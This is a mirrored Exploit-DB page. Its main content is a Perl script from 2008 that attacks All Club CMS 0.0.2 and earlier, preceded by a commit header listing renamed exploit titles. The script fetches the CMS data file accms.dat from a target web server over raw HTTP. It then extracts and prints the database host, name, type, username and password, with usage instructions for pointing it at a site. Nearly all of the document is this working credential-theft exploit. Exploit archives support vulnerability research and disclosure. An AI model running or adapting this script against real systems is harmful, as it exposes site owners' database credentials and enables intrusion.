exploit-db-mirror/platforms/php/webapps/7266.pl
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

130 lines
3.4 KiB
Perl
Executable file

#!/usr/bin/perl
=about
All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit
-------------------------------------------------------
by athos - staker[at]hotmail[dot]it
download on http://sourceforge.net
-------------------------------------------------------
Usage: perl exploit.pl localhost/cms [MODE]
perl exploit.pl localhost/cms all
perl exploit.pl localhost/cms default
-------------------------------------------------------
NOTE: Don't add me on MSN Messenger
=cut
use strict;
use warnings;
use IO::Socket;
use LWP::UserAgent;
my (@conf,$result);
my $host = shift;
my $path = shift;
my $mode = shift or &usage;
my @data = split /=\s/,dbconfig();
die "Exploit Failed!\n" unless(join('',@data) =~ /DB_PASS/i);
if($mode =~ /all/i)
{
my $http = new LWP::UserAgent(
agent => 'Lynx (textmode)',
timeout => 5,
) or die $!;
my $send = $http->get("http://${host}/${path}/accms.dat");
if($send->is_success)
{
print STDOUT $send->content;
exit;
}
else
{
print STDERR $send->status_line;
exit;
}
}
if($mode =~ /default/i)
{
$data[9] =~ s/\s/\0/; # password
$data[8] =~ s/DB_PASS/\0/; # username
$data[7] =~ s/DB_USER/\0/; # db host
$data[6] =~ s/DB_HOST/\0/; # db name
$data[5] =~ s/DEF_DB/\0/; # db type
@conf = (
'dbhost:' => $data[7],
'dbname:' => $data[6],
'dbtype:' => $data[5],
'username:' => $data[8],
'password:' => $data[9],
);
foreach(@conf)
{
$result .= $_;
}
my $content = join '',split / /,$result;
if($content =~ /(dbhost|dbname|dbtype|username|password)/i)
{
print STDOUT "[-] Exploit Successfully!\n";
print STDOUT $content;
exit;
}
else
{
print STDOUT "[-] Exploit Failed!\n";
print STDOUT "[-] by athos - staker[at]hotmail[dot]it\n";
exit;
}
}
sub dbconfig
{
my $html;
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
my $data = "GET /$path/accms.dat HTTP/1.1\r\n".
"Host: $host\r\n".
"User-Agent: Lynx (textmode)\r\n".
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: text/plain\r\n".
"Connection: close\r\n\r\n";
$sock->send($data);
while(<$sock>)
{
$html .= $_;
} return $html if $html =~ m{HTTP/1.1 200 OK};
}
sub usage
{
print STDOUT "[-] All Club CMS <= 0.0.2 Remote DB Config Retrieve Exploit\n";
print STDOUT "[-] Usage: perl $0 [host] [path] [mode]\n";
print STDOUT " perl $0 localhost /cms all\n";
print STDOUT " perl $0 localhost /cms default\n";
exit;
}
# milw0rm.com [2008-11-28]